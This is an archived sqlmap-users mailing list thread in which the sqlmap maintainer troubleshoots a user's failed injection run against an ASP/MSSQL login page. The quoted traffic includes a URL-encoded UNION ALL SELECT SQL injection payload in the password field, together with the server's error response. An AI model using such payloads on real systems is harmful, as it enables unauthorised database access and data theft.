sqlmap-users Mailing List for sqlmap (Page 66)

SourceForge Headquarters 225 Broadway Suite 1600 San Diego, CA 92101 +1 (858) 422-6466

Hi.

As there is no DBUSERNAME in the request I would say that the request is
not the problem here. Now, I am interested how Havij manages it though.

Is there a way for you to provide me privately with either: target url or
untouched traffic file together with Burp log for Havij run against that
target?

Without more info I won't be able to help you more

Kind regards,
Miroslav Stampar
On Feb 21, 2012 10:25 PM, "John Booth" <sql...@ho...> wrote:

>  DBUSERNAME = database user name
>
> DATABASENAME = name of the current database
>
>
> let me know if this is not helpful or if you need the snippet of html
> (which is just the hopepage)
>
>
> HTTP request [#1]:
>
> POST /index.asp?action=auth HTTP/1.1
>
> Accept-Encoding: identity
>
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Host: site.com
>
> Accept-language: en-us,en;q=0.5
>
> Pragma: no-cache
>
> Cache-control: no-cache,no-store
>
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>
> Connection: close
>
>
> UN=admin&PW=admin&x=0&y=0
>
>
> HTTP response [#1] (200 OK):
>
> Content-length: 7091
>
> X-powered-by: ASP.NET
>
> Set-cookie: sitecom=0; path=/,
> ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP; path=/
>
> Age: 6
>
> Uri: http://site.com:80/index.asp?action=auth
>
> Server: Microsoft-IIS/6.0
>
> Connection: close
>
> Cache-control: private
>
> Date: Tue, 21 Feb 2012 21:15:23 GMT
>
> Content-type: text/html
>
>
>
> **
>
>
> HTML OF HOMEPAGE - if relevant will add
>
>
> **
>
>
>
> ############################################################################
>
>
> HTTP request [#2]:
>
> POST /index.asp?action=auth HTTP/1.1
>
> Accept-Encoding: identity
>
> Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7
>
> Host: site.com
>
> Accept-language: en-us,en;q=0.5
>
> Pragma: no-cache
>
> Cache-control: no-cache,no-store
>
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
>
> User-agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en)
> AppleWebKit/521.25 (KHTML, like Gecko) Safari/521.24
>
> Cookie: ASPSESSIONIDACBCTBTT=OAPHPFEDGAJJFAOODAMAOFKP;sitecom=0
>
> Connection: close
>
>
> UN=admin&PW=-8805%27%20UNION%20ALL%20SELECT%20CHAR%2858%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%2858%29%2BISNULL%28CAST%28COUNT%28%2A%29%2
> 0AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%2BCHAR%2858%29%2BCHAR%28114%29%2BCHAR%28120%29%2BCHAR%28100%29%2BCHAR%2858%29%20FROM%20DATABASENAME..sysobjects%20IN
> NER%20JOIN%20DATABASENAME..sysusers%20ON%20DATABASENAME..sysobjects.uid%20%3D%20DATABASENAME..sysusers.uid%20WHERE%20DATABASENAME..sysobjects.xtype%20IN%20%28CHAR%28117%29%2CCHAR%2
> 8118%29%29--%20%20AND%20%27qqvj%27%3D%27qqvj&x=0&y=0
>
>
> HTTP response [#2] (500 Internal Server Error):
>
> Content-length: 480
>
> X-powered-by: ASP.NET
>
> Set-cookie: sitecom=0; path=/
>
> Age: 2
>
> Uri: http://www.site.com:80/index.asp?action=auth
>
> Server: Microsoft-IIS/6.0
>
> Connection: close
>
> Cache-control: private, no-store
>
> Date: Tue, 21 Feb 2012 21:15:28 GMT
>
> Content-type: text/html
>
>
>
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
>
> <html>
>
> <head>
>
> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
>
>
>  <font face="Arial" size=2>
>
> <p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial"
> size=2>error '80004005'</font>
>
> <p>
>
> <font face="Arial" size=2>Server user 'DBUSERNAME' is not a valid user in
> database 'DATABASENAME'.</font>
>
> <p>
>
> <font face="Arial" size=2>/index.asp</font><font face="Arial" size=2>,
> line 16</font>
>
>
>
> ############################################################################
>
>
>

2008	Jan	Feb	Mar	Apr	May	Jun	Jul	Aug	Sep (4)	Oct (11)	Nov (24)	Dec (13)
2009	Jan (23)	Feb (17)	Mar (13)	Apr (48)	May (22)	Jun (18)	Jul (22)	Aug (13)	Sep (23)	Oct (6)	Nov (11)	Dec (25)
2010	Jan (21)	Feb (33)	Mar (61)	Apr (47)	May (48)	Jun (30)	Jul (24)	Aug (37)	Sep (52)	Oct (59)	Nov (32)	Dec (57)
2011	Jan (166)	Feb (93)	Mar (65)	Apr (117)	May (87)	Jun (124)	Jul (102)	Aug (78)	Sep (65)	Oct (22)	Nov (71)	Dec (79)
2012	Jan (93)	Feb (55)	Mar (45)	Apr (49)	May (56)	Jun (93)	Jul (95)	Aug (42)	Sep (26)	Oct (36)	Nov (32)	Dec (46)
2013	Jan (36)	Feb (78)	Mar (38)	Apr (57)	May (35)	Jun (39)	Jul (23)	Aug (33)	Sep (28)	Oct (38)	Nov (22)	Dec (16)
2014	Jan (33)	Feb (23)	Mar (41)	Apr (29)	May (12)	Jun (20)	Jul (21)	Aug (23)	Sep (18)	Oct (34)	Nov (12)	Dec (39)
2015	Jan (2)	Feb (51)	Mar (10)	Apr (28)	May (9)	Jun (22)	Jul (32)	Aug (35)	Sep (29)	Oct (50)	Nov (8)	Dec (2)
2016	Jan (8)	Feb (2)	Mar (3)	Apr (14)	May	Jun	Jul	Aug (12)	Sep	Oct	Nov (1)	Dec (19)
2017	Jan	Feb (18)	Mar	Apr (1)	May	Jun	Jul	Aug (4)	Sep	Oct	Nov (2)	Dec
2018	Jan	Feb	Mar (1)	Apr (1)	May (3)	Jun	Jul	Aug	Sep	Oct	Nov	Dec
2019	Jan	Feb	Mar	Apr (3)	May	Jun	Jul	Aug	Sep	Oct	Nov	Dec

sqlmap-users Mailing List for sqlmap (Page 66)

sqlmap-users — sqlmap users mailing list